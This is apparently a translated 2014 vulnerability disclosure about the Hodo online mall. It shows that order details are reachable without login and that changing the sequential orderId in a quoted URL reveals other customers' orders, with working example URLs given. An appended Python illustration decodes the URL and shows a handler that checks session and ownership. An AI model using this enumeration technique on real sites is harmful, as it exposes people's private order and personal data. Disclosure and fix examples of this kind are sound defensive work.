2014-02-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly. 2014-05-11: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
After a user places an order and clicks to view it, the URL of the resulting link embeds a second, unvalidated URL. That embedded URL displays the user's order information on its own, which is what causes the vulnerability.
I registered an account on the Hodo mall to play around, picked a product at random, filled in the order form, and after confirming the order viewed the order information. Its URL was as follows:
https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362
Hard on the eyes, so I decoded it.
https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX+VEXYJDb5ICN8N5ebOfDqYAM9VLjrCb+L42et5s=&ddkey=http:AjaxLogonForm#https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362
As you can see, it embeds another address:
https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362
Opening this address by itself shows the order information:
So, can the order information be viewed without being logged in? I opened it in another browser and, sure enough, it can be viewed directly. I changed the parameters straight away to see if there were any surprises, and found that changing the orderId parameter value in the URL above lets you view other users' information. The case of orderId = 3720528 (
https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361
):
The case of orderId = 3720518 (
https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720518&storeId=10151&orderStatusCode=&identifier=1392122503361
):
orderId = 3720528 (
Add authentication and authorization checks...
Unable to contact the vendor, or the vendor actively declined.
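The fix the report asks for is a server-side check that the order view requires a logged-in session and that the requested orderId belongs to that session's user. The following is an added illustration, not code from the report or from the Hodo site, showing (1) how the order URL embedded in the AjaxLogonForm fragment decodes to an orderId, and (2) an order-view handler that makes the same sequential-id request fail for anonymous and non-owner callers. The order store, user ids and the handler's return values are constructed for the example; the URL is the one quoted in the report.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit, unquote, parse_qs

# The order-view URL quoted in the report, with its inner URL percent-encoded in the fragment.
REPORTED_URL = (
    "https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7"
    "&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm"
    "#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb"
    "%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001"
    "%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362"
)


def embedded_order_id(url: str):
    """Decode the inner URL carried in the fragment and pull out its orderId.

    Returns (inner_url, order_id) with order_id as int, or None if absent.
    """
    outer = urlsplit(url)
    inner_url = unquote(outer.fragment)        # "%3A" -> ":", "%26" -> "&", ...
    inner = urlsplit(inner_url)
    params = parse_qs(inner.query)
    values = params.get("orderId")
    return inner_url, (int(values[0]) if values else None)


@dataclass(frozen=True)
class Order:
    order_id: int
    owner_user_id: int
    summary: str


# Constructed sample data: two orders with consecutive ids owned by different users.
# (Not real Hodo orders; user ids 1001/1002 are assumptions for the example.)
ORDERS = {
    3720529: Order(3720529, 1001, "order of user 1001"),
    3720528: Order(3720528, 1002, "order of user 1002"),
}


def view_order_vulnerable(order_id: int):
    """Behaviour the report describes: any caller gets any order by id."""
    order = ORDERS.get(order_id)
    return (200, order.summary) if order else (404, None)


def view_order(session_user_id, order_id: int):
    """Hardened handler: require a session, then require ownership of the object.

    Returns (http_status, body). Missing and foreign orders both return 404 so the
    response does not reveal whether a guessed id exists.
    """
    if session_user_id is None:
        return 401, None                       # anonymous caller: not logged in
    order = ORDERS.get(order_id)
    if order is None or order.owner_user_id != session_user_id:
        return 404, None                       # object-level authorization failed
    return 200, order.summary


if __name__ == "__main__":
    inner, oid = embedded_order_id(REPORTED_URL)
    print("embedded URL:", inner)
    print("orderId:", oid)
    print("vulnerable, anonymous:", view_order_vulnerable(oid))
    print("hardened, anonymous:  ", view_order(None, oid))
    print("hardened, other user: ", view_order(1002, oid))
    print("hardened, owner:      ", view_order(1001, oid))
```

The ownership comparison is the part the vulnerable endpoint lacks: checking for a session alone would still let any logged-in customer walk the consecutive orderId values, so the handler must tie the requested id to the authenticated user before returning anything.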